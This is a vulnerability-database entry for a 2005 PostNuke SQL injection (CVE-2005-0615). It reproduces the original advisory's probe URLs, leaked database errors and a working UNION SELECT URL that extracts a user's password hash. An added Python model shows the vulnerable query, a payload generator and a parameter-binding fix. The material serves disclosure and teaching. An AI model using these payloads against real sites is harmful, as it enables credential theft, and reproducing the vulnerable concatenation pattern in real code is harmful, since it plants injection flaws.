PostNuke vulnerability

Vulnerability ID: 1199323    Type: SQL injection
Published: 2005-05-02    Updated: 2005-05-02
CVE ID: CVE-2005-0615
CNNVD ID: CNNVD-200505-778
Platform: N/A    CVSS score: 7.5
|Vulnerability sources
https://www.securityfocus.com/bid/82416
https://cxsecurity.com/issue/WLB-2005090033
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-778
|Details
Multiple SQL injection vulnerabilities in (1) index.php, (2) modules.php, or (3) admin.php in PostNuke 0.760-RC2 allow remote attackers to execute arbitrary SQL commands via the catid parameter.
|Exploit
[PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1]

Author: Maksymilian Arciemowicz
Date: 15.2.2005

--- 0. Description ---

PostNuke: The Phoenix Release (0.760-RC2=>x)

PostNuke is an open source, open development content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


--- 1. Critical SQL INJECTION ---
This SQL injection is in modules/News/funcs.php in the function getArticles(). When this function
is active (Other Stories), we can add an SQL query in the variable catid.

For example:

http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY
pn_stories.pn_time DESC LIMIT 10,10' at line 23
---------------

http://[HOST]/[DIR]/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3

Error message :
---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY
pn_stories.pn_time DESC LIMIT 10,10' at line 23
---------------

http://[HOST]/[DIR]/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3

Error message :
---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY
pn_stories.pn_time DESC LIMIT 10,10' at line 23
---------------

etc.

and the variable $query is:

---------------
SELECT pn__stories.pn_aid AS "aid", pn__stories.pn_bodytext AS "bodytext",
pn__stories_cat.pn_themeoverride AS "catthemeoverride", pn__stories.pn_catid AS "cid",
pn__stories_cat.pn_title AS "cattitle", pn__stories.pn_comments AS "comments",
pn__stories.pn_counter AS "counter", pn__stories.pn_hometext AS "hometext",
pn__stories.pn_informant AS "informant", pn__stories.pn_notes AS "notes", pn__stories.pn_sid AS
"sid", pn__stories.pn_themeoverride AS "themeoverride", pn__topics.pn_topicid AS "tid",
pn__stories.pn_time AS "time", pn__stories.pn_title AS "title", pn__topics.pn_topicname AS
"topicname", pn__topics.pn_topicimage AS "topicimage", pn__topics.pn_topictext AS
"topictext",
pn__topics.pn_counter AS "tcounter", pn__stories.pn_time AS "unixtime", pn__stories.pn_withcomm
AS "withcomm" FROM pn__stories LEFT JOIN pn__stories_cat ON pn__stories.pn_catid =
pn__stories_cat.pn_catid LEFT JOIN pn__topics ON pn__stories.pn_topic = pn__topics.pn_topicid
WHERE (pn__stories.pn_language
='eng' OR pn__stories.pn_language='') AND pn__stories.pn_catid='cXIb8O3 ORDER BY
pn__stories.pn_time DESC
---------------

Exploit:
This exploit gets the password of the user with id=2. But first check the prefix.

Step 1.
http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY
pn_stories.pn_time DESC LIMIT 10,10' at line 23
---------------

and pn_ is the prefix.

Step 2.
http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/*

--- 2. How to fix ---

Download the new version of the script or update.

--- 3. Contact ---
Author: Maksymilian Arciemowicz
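The block below is an added example and is not code from the advisory or from PostNuke. It models the getArticles() pattern described above in Python on an in-memory SQLite database with a constructed, cut-down schema (three result columns instead of the 21 in the real query, a made-up users table and a made-up password hash), so that the advisory's two steps and the fix can be run offline: the stray-quote probe whose verbose error leaks the tail of the query and with it the table prefix, the UNION SELECT payload that replaces the story rows with the uid=2 user's password hash (in the real 21-column query the advisory's payload puts pn_pass in the 15th column, which is rendered as the story title), and a fixed version that casts catid to an integer and binds it. The names pn_stories, pn_users, pn_uname, pn_pass, pn_uid and the pn_ prefix follow the advisory; the table contents, the hash value and the helper names are assumptions.

```python
import re
import sqlite3

# Constructed, reduced model of the advisory's getArticles() query.
# Added example, not PostNuke's modules/News/funcs.php. Schema, rows and
# the password hash are made up; only the pn_ names follow the advisory.
PREFIX = "pn_"   # the table prefix the advisory recovers from the error message


def make_db():
    """Build an in-memory SQLite database with a cut-down stories/users schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {PREFIX}stories (pn_sid INTEGER, pn_catid INTEGER,
                                       pn_title TEXT, pn_time INTEGER);
        CREATE TABLE {PREFIX}users (pn_uid INTEGER, pn_uname TEXT, pn_pass TEXT);
        INSERT INTO {PREFIX}stories VALUES (1, 1, 'First story', 100);
        INSERT INTO {PREFIX}stories VALUES (2, 1, 'Second story', 200);
        INSERT INTO {PREFIX}stories VALUES (3, 2, 'Other category', 300);
        INSERT INTO {PREFIX}users VALUES (1, 'anonymous', '');
        INSERT INTO {PREFIX}users VALUES (2, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def get_articles_vulnerable(conn, catid):
    """The flaw: catid is concatenated unquoted into the WHERE clause, which is why
    the advisory's $query dump shows pn_catid=' followed by the attacker's input."""
    query = (f"SELECT pn_sid AS sid, pn_title AS title, pn_time AS time "
             f"FROM {PREFIX}stories WHERE pn_catid={catid} "
             f"ORDER BY {PREFIX}stories.pn_time DESC LIMIT 0,10")
    return conn.execute(query).fetchall()


def get_articles_fixed(conn, catid):
    """Hardened form: reject anything that is not an integer, then bind the value."""
    catid = int(catid)          # raises ValueError on "'cXIb8O3" or a UNION payload
    query = (f"SELECT pn_sid AS sid, pn_title AS title, pn_time AS time "
             f"FROM {PREFIX}stories WHERE pn_catid=? "
             f"ORDER BY {PREFIX}stories.pn_time DESC LIMIT 0,10")
    return conn.execute(query, (catid,)).fetchall()


def probe_error(conn, catid):
    """Step 1 of the advisory: send a stray quote and capture the verbose DB error."""
    try:
        get_articles_vulnerable(conn, catid)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return ""


def leaked_prefix(error_message):
    """Recover the table prefix from the leaked query tail (e.g. pn_stories.pn_time)."""
    match = re.search(r"(\w*?)stories\.pn_time", error_message)
    return match.group(1) if match else None


def union_payload(ncols, pass_col, prefix=PREFIX, uid=2):
    """Step 2 of the advisory, generalised: a UNION SELECT with as many columns as
    the original SELECT, pn_uname in the first column, pn_pass in the column that
    gets rendered, NULL elsewhere, and /* to comment out the trailing ORDER BY/LIMIT.
    The advisory's real payload needs 21 columns; this model's query has 3."""
    cols = ["null"] * ncols
    cols[0] = "pn_uname"
    cols[pass_col] = "pn_pass"
    return (f"-99999 UNION SELECT {', '.join(cols)} "
            f"FROM {prefix}users WHERE pn_uid={uid}/*")


if __name__ == "__main__":
    db = make_db()
    msg = probe_error(db, "'cXIb8O3")
    print("leaked error:", msg)
    print("prefix:", leaked_prefix(msg))
    print("vulnerable:", get_articles_vulnerable(db, union_payload(3, 1)))
    try:
        get_articles_fixed(db, union_payload(3, 1))
    except ValueError as exc:
        print("fixed rejects payload:", exc)
```

SQLite's error text differs from MySQL's 1064 message, but the leak is the same kind: the unterminated string token runs to the end of the statement, so the whole tail including the prefixed table name comes back to the client. The fix shown is the minimal one for a numeric parameter; binding alone would also stop the injection, but casting first also keeps the verbose error from ever being triggered by this input.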
|Affected products
PostNuke Software Foundation PostNuke 0.760 RC2
|References

Source: SECTRACK
Name: 1013324
Link: http://securitytracker.com/id?1013324
Source: news.postnuke.com
Link: http://news.postnuke.com/Article2669.html
Source: BUGTRAQ
Name: 20050228 [SECURITYREASON.COM] PostNuke Critical SQL Injection 0.760-RC2=>x
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110962819232255&w=2
